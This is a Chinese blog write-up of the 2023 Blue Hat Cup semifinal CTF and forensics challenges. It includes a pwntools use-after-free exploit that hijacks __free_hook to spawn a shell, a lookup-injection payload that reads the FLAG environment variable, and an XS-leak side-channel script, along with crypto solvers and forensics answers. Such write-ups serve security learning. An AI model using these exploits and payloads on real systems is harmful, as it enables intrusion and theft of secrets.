2023年第七届蓝帽杯半决赛WP(CTF&取证)

已于 2023-09-19 10:33:45 修改
阅读量1.4k 收藏 12
点赞数 6
分类专栏: ctf 取证 文章标签: 安全
于 2023-09-18 11:17:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63576152/article/details/132969330
版权

CTF部分

re

justamat

根据字符串找到主函数

直接看最后的校验函数

跟进check函数

可以找到data1和data2两组数据,data1和data2都有400个数

乘法就是主要加密,整体而言其实就是矩阵的乘法(题目的mat也算是个提示吧)

设输入为X,则X * data1 = data2

那么X = data2 * data1的逆

D键,将data2转换成8字节的数,变成100个数

exp如下:

import numpy as np
data1=[254 ,11 ,29 ,246 ,131, 255 ,224 ,184 ,221, 176, 197, 222, 246, 20, 159, 221, 217, 7, 45, 107, 25, 202, 115, 253, 135, 114, 36, 4, 73, 126, 169, 206, 145, 190, 65, 24, 96, 63, 43, 99, 28, 210, 144, 233, 142, 186, 30, 243, 65, 173, 44, 3, 105, 218, 16, 253, 253, 231, 6, 54, 214, 2, 89, 24, 204, 80, 135, 175, 251, 24, 68, 127, 173, 248, 44, 103, 29, 34, 132, 172, 14, 35, 220, 230, 187, 210, 184, 74, 188, 222, 80, 156, 28, 30, 134, 58, 45, 221, 195, 3]
data2=[116275, 122772, 134847, 178752, 125060, 155857, 129457, 125466, 126634, 122802, 115152, 126706, 136929, 179712, 129886, 154996, 126976, 131798, 131074, 122366, 114711, 127116, 141302, 182202, 131502, 163775, 134689, 130908, 130402, 125256, 114286, 128215, 142477, 181075, 129243, 159261, 130913, 125455, 127190, 126376, 109949, 98840, 117972, 145846, 109644, 134524, 121191, 107764, 117464, 104110, 99099, 97861, 118991, 147167, 98734, 137056, 119732, 95702, 97594, 104783, 71837, 85199, 87694, 98027, 78462, 92741, 76065, 73712, 79427, 71465, 86417, 97559, 94818, 108643, 94224, 97040, 85916, 82920, 89755, 74796, 63116, 71978, 86189, 111008, 85088, 98987, 81739, 82342, 88739, 79305, 120943, 125178, 136589, 179628, 134735, 163558, 136121, 134790, 135679, 123375]

data2_matrix=[]
for i in range(10):
    row=[]
    for j in range(10):
        row.append(data2[10*i+j])
    data2_matrix.append(row)

data1_matrix=[]
for i in range(10):
    row=[]
    for j in range(10):
        row.append(data1[10*i+j])
    data1_matrix.append(row)

data1_matrix = np.array(data1_matrix)   #data1的矩阵形式
data2_matrix = np.array(data2_matrix)   #data2的矩阵形式
data1_matrix_inverse = np.linalg.inv(data1_matrix)    #data1的逆矩阵
flag = np.dot(data2_matrix, data1_matrix_inverse)     #矩阵乘法
flag = flag.flatten()
for i in flag:
    print(chr(round(i)),end='')

pwn

admin

第一个输入的命令是有效的

先看看目录

再重新cat f*

uaf

exp如下

from pwn import *

p = remote('120.78.209.16','46460')
elf = ELF('./main')
libc = ELF('./libc-2.31.so')

def add(size,content):
    p.sendlineafter('>>','1')
    p.sendlineafter('size:',str(size))
    p.sendafter('content:',content)
def free(index):
    p.sendlineafter('>>','2')
    p.sendlineafter('index:',str(index))
def edit(index,content):
    p.sendlineafter('>>','3')
    p.sendlineafter('index:',str(index))
    p.sendafter('content:',content)
def show():
    p.sendlineafter('>>','4')

add(0x4a0,b'aaa')
add(0x10,b'aaa')
free(0)
add(0x4a0,b'aaa')
free(0)
show()
p.recvuntil('0. ')
libcbase = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x1ebbe0
print(hex(libcbase))


add(0x10,b'a')
free(1)
add(0x10,b'a')
free(3)
free(1)
edit(4,p64(libcbase+libc.sym['__free_hook']))
add(0x10,b'sh\x00\x00')
add(0x10,p64(libcbase+libc.sym['system']))
free(5)

p.interactive()

web

MyLinuxBot

与谷歌CTF2022题目基本一致,执行:${java:${env:FLAG}}

AirticleShare

题目提示侧信道攻击

看这篇文章可以找到原题

36c3 Web 学习记录

修改一下Payload

import requests
import time

s = requests.Session()

base_url = "http://112.74.185.213:46791/"

res = s.get(base_url)

pos = res.text.find('name="c" value="') + len('name="c" value="')
csrftoken = res.text[pos:pos+16]
print(csrftoken)
ss = "1234567890abcdef"
flag = "56b86cb4b4d38da"

# for i in range(16):
# time.sleep(3)
for j in ss:
    payload = f"<form data-parsley-validate><input data-parsley-required data-parsley-trigger=\"blur\" data-parsley-error-message='<input type=\"input\" id=like value=\"rebirth_is_really_nb\">' data-parsley-errors-container=\'a[href^=\"/lookup.php?id={flag + j}\"]\' autofocus></form>"
    data = {'c': csrftoken, 'content': payload}
    res = s.post(base_url + "add.php", data=data, allow_redirects=False)
    print(res.content)
    location = res.headers['Location']
    pos = location.find('id=') + 3
    wp = location[pos:]
    data = {'c': csrftoken, 'id': wp}
    res = s.post(base_url + "admin.php", data=data)
    print(res.content)
    time.sleep(4)

    s.get(f"http://112.74.185.213:46791/lookup.php?id={wp}")
    res = s.get(f"http://112.74.185.213:46791/lookup.php?id={wp}")
    print(res.text)
    txt = res.text.replace("\n", "").replace("\r", "")
    if "Liked by</h3>admin" not in txt:
        print(res)
        flag += j
        print(flag)
        break

因为网络问题,直接for循环会出现问题,所以一个一个字符去做的

misc

排队队吃果果

打开xlsx文件,打开以后,发现没有字,ctrl+a全选,修改你字体颜色,发现有些加粗,有些没加粗,结合题目,应当排序,将每一列从小到大排序,将加粗的单元格改成黑色,将列宽改为2,得到二维码,扫描后得到flag。

crypto

ezrsa

X对应153801856029563198525204130558738800846256680799373350925981555360388985602786501362501554433635610131437376183630577217917787342621398264625389914280509

Y对应8086061902465799210233863613232941060876437002894022994953293934963170056653232109405937694010696299303888742108631749969054117542816358078039478109426

用SymPy库解方程

import sympy

X = 153801856029563198525204130558738800846256680799373350925981555360388985602786501362501554433635610131437376183630577217917787342621398264625389914280509
Y = 8086061902465799210233863613232941060876437002894022994953293934963170056653232109405937694010696299303888742108631749969054117542816358078039478109426
n = 161010103536746712075112156042553283066813155993777943981946663919051986586388748662616958741697621238654724628406094469789970509959159343108847331259823125490271091357244742345403096394500947202321339572876147277506789731024810289354756781901338337411136794489136638411531539112369520980466458615878975406339
c = 15380535750650959213679345560658190067564859611922563753882617419201718847747207949211621591882732604480600745000879508274349808435529637573773711729853565120321608048340424321537282281161623712479117497156437792084977778826238039385697230676340978078264209760724043776058017336241110097549146883806481148999

p, q = sympy.symbols("p q")
f1 = q-p-1-X-Y*2
f2 = (p)*(q) - n
a = sympy.solve([f1, f2], [p, q])
print(a)
#p=12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
#q=12774247264858490260286489817359549241755117653791190036750069541210299769639605520977166141575653832360695781409025914510310324035255606840902393222949771
import gmpy2
import libnum
p = 12604273285023995463340817959574344558787108098986028639834181397979984443923512555395852711753996829630650627741178073792454428457548575860120924352450409
q = 12774247264858490260286489817359549241755117653791190036750069541210299769639605520977166141575653832360695781409025914510310324035255606840902393222949771
e = 0x10001
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = gmpy2.powmod(c, d, p * q)
print(libnum.n2s(int(m)))

取证部分

1.检材数据开始提取是今年什么时候?(答案格式:04-12 13:26)

09-11 17:21

logs.log中查看

2.嫌疑人手机SD卡存储空间一共多少GB?(答案格式: 22.5)

24.32

logs.log中查看

3.嫌疑人手机设备名称是?(答案格式:adfer)

sailfish

4.嫌疑人手机IMEI是?(答案格式:3843487568726387)

352531082716257

5.嫌疑人手机通讯录数据存放在那个数据库文件中?(答案格式:call.db)

contacts.db

安卓存放联系人的数据库文件

6.嫌疑人手机一共使用过多少个应用?(答案格式:22)

应用日志查看有使用时间的应用,导出记录excel看一下是100个(但是是错的)

7.测试apk的包名是?(答案格式:con.tencent.com)

com.example.myapplication

雷电APP

8.测试apk的签名算法是?(答案格式:AES250)

SHA256withRSA

jadx是SHA256withRSA,雷电app是SHA256-RSA,这里猜前者了

9.测试apk的主入口是?(答案格式:com.tmp.mainactivity)

com.example.myapplication.MainActivity

Manifest中可以找到

10.测试apk一共申请了几个权限?(答案格式:7)

3

jeb打开(雷电app也有,Manifest里也能看出来)

11.测试apk对Calllog.txt文件内的数据进行了什么加密?(答案格式:DES)

Base64、BASE64后来可能都算对了

12.10086对嫌疑人拨打过几次电话?(答案格式:5)

2

base64解码calllog.txt,得到通话记录,搜索10086结果是2条,且都为呼进

13.测试apk对短信记录进行了几次加密?(答案格式:5)

2

分别是base64和AES加密

14.测试apk对短信记录进行加密的秘钥是?(答案格式:slkdjlfslskdnln)

bGlqdWJkeWhmdXJp

对SMS.txt的加密逻辑是先AES加密,再base64加密,AES的秘钥在Getkey函数中


Getkey函数在native层,那么打开so文件寻找

搜索getkey,函数逻辑是first进行base64加密,且截取前16位

cyberchef加密一下,获取前16位

15.嫌疑人在2021年登录支付宝的验证码是?(答案格式:3464)

9250

用得到的秘钥解密SMS.txt文件,得到短信记录,轻松找到验证码

总结:题目太水了

Jugg_xie
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021黑盾杯CTF部分WP
qq_45149716的博客
12-05 5042
一、 Signin 通过观察附件得到附件为一个文本 全由01组成 根据以往的经验来是这个应该是是通过PIL库将01转换为像素点来构造二维码 from PIL import Image MAX = 500 pic = Image.new("RGB", (MAX, MAX)) str="1111...1111" #文档太大所以省略了文档内容" i = 0 for y in range(0, MAX): for x in range(0, MAX): if str[i] == '1':
2020网鼎杯网络安全夺旗赛半决赛题目源代码
11-29
2020年的“网鼎杯”网络安全夺旗赛半决赛是一场备受瞩目的赛事,其独特的AWD PLUS模式更增加了比赛的挑战性和趣味性。此次比赛的源代码分析将为我们提供深入理解网络安全技术与策略的独特视角。 首先,我们需要了解...
2023 天使杯CTF --- wp
3tefanie丶zhou的博客
06-03 1227
【人,终究会被年少不可得之物困其一生】
上海磐石ctf部分wp
weixin_44807430的博客
05-28 293
磐石wp
CTF校赛总结wp【web】
最新发布
qq_57356551的博客
05-13 320
作为ctf的小白,也是借着学校组织ctf比赛的机会锻炼了一下自己,总的来说,还是有蛮多收获的,理解了一些平时没弄懂的问题,也对接下来的学习有了一个方向,话不多说,记录一下wp
CTF练习题WP1
m0_73891130的博客
03-25 612
自己写的CTF常用网站的练习题目的WP,当然也有参考网上的大佬的WP
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7646
BUUCTF题目Misc部分wp(持续更新)
【第六届强网杯CTF-Wp
qq_45603443的博客
08-02 2477
第六届强网杯全国网络安全挑战赛wp
ctfshow大部分wp(附带个人整理知识笔记)
ZxC789456302的博客
10-01 6998
WEB信息搜集入门(前10道都是水题,10题后没有水题了)源码中即为flag(签到题)前端js拦截,查看源代码即可,得到flagflag在响应头里面在访问robots.txt,得知存在flagishere.txt文件,访问获得flagphps源码泄露,访问index.phps,下载文件打开得到flag访问www.zip获取配置文件得知在服务器下存在fl000g.txt,线上访问得到flag访问.git(隐藏文件)注意格式为/.git/,得到flag隐藏文件的第二种情况,访问.svn,格式为/.svn/,得到
领航杯 CTF 2021 决赛 真题 7z
12-07
领航杯 CTF 2021 决赛
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
CTF 湖湘杯 决赛 2021 final.zip
12-07
【CTF 湖湘杯 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘杯作为一项知名的CTF比赛,旨在促进网络安全...
智能网联汽车 天融信杯 信息安全攻防赛 2023 CTF真题
07-14
智能网联汽车 天融信杯 信息安全攻防赛 2023 CTF真题
2022年暑期CTF刷题WP(停止更新)
qq_52820087的博客
06-19 3557
2022年暑期CTF刷题之路
[第七届杯全国大学生网络安全技能大赛 杯 2023]——Web方向部分题 详细Writeup
Leaf_initial的博客
08-27 4249
Web LovePHP 你真的熟悉PHP吗? 源码如下 <?php class Saferman{ public $check = True; public function __destruct(){ if($this->check === True){ file($_GET['secret']); } } public function __wakeup(){ $this->c
2023杯初赛--取证部分
m0_64787014的博客
09-01 1485
5万华哥pslist命令2456还是pslist命令(前面一个是pid,后面是ppid)
【CTF】Web反序列wp
毅哥的博客
12-30 268
一道关于反序列法的web题 <?php error_reporting(0); $name=$_GET['name']; $age=$_GET['age']; $pop=$_GET['pop']; if(isset($name) && isset($age)){ $word = unserialize($pop); if($word->cname($name,$age)){ $word->cflag(); }e
2022杯初赛wp
mumuzi的博客
07-10 5110
2022初赛
CTF取证总结(内存取证,磁盘取证)以及例题复现
热门推荐
Love&Share
09-20 2万+
内存取证 经常利用volatility分析 取证文件后缀 .raw、.vmem、.img 常用命令(imageinfo,pslist,dumpfiles,memdump) 可疑的进程(notepad,cmd) 和磁盘取证结合起来考察 了解部分操作系统原理 常见文件后缀dmg,img volatility基础命令 python vol.py -f [image] ‐-profile=[profile][plugin] 命令 其中 -f 后面加的是要取证的文件, --profile 后加的是工具识别出的系
杯全国大学生网络安全技能大赛
08-24
杯全国大学生网络安全技能大赛是一项面向全国大学生的网络安全竞赛。该比赛旨在提升大学生的网络安全技能和意识,促进网络安全人才的培养。比赛内容涵盖了各个领域的网络安全知识和技能,包括但不限于电子取证、加密通道、Web安全等方面。 该比赛提供了一系列赛题和附件,选手需要根据题目要求进行解答和实践。例如,电子取证赛题中,选手需要完成对手机取证的任务,通过分析附件中的数据和信息来获取所需的证据[2]。还有其他赛题如加密的通道和Web安全等,选手需要运用相关的知识和技能来解决问题。杯全国大学生网络安全技能大赛为大学生提供了锻炼和展示自己网络安全能力的平台,也为培养网络安全人才作出了积极的贡献。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[ CTF ]【天格】战队WriteUp-第六届”杯“全国大学生网络安全技能大赛(半决赛)](https://blog.csdn.net/ZXW_NUDT/article/details/126173643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [[ CTF ]天机战队WriteUp-第六届”杯“全国大学生网络安全技能大赛(初赛)](https://blog.csdn.net/ZXW_NUDT/article/details/125715546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值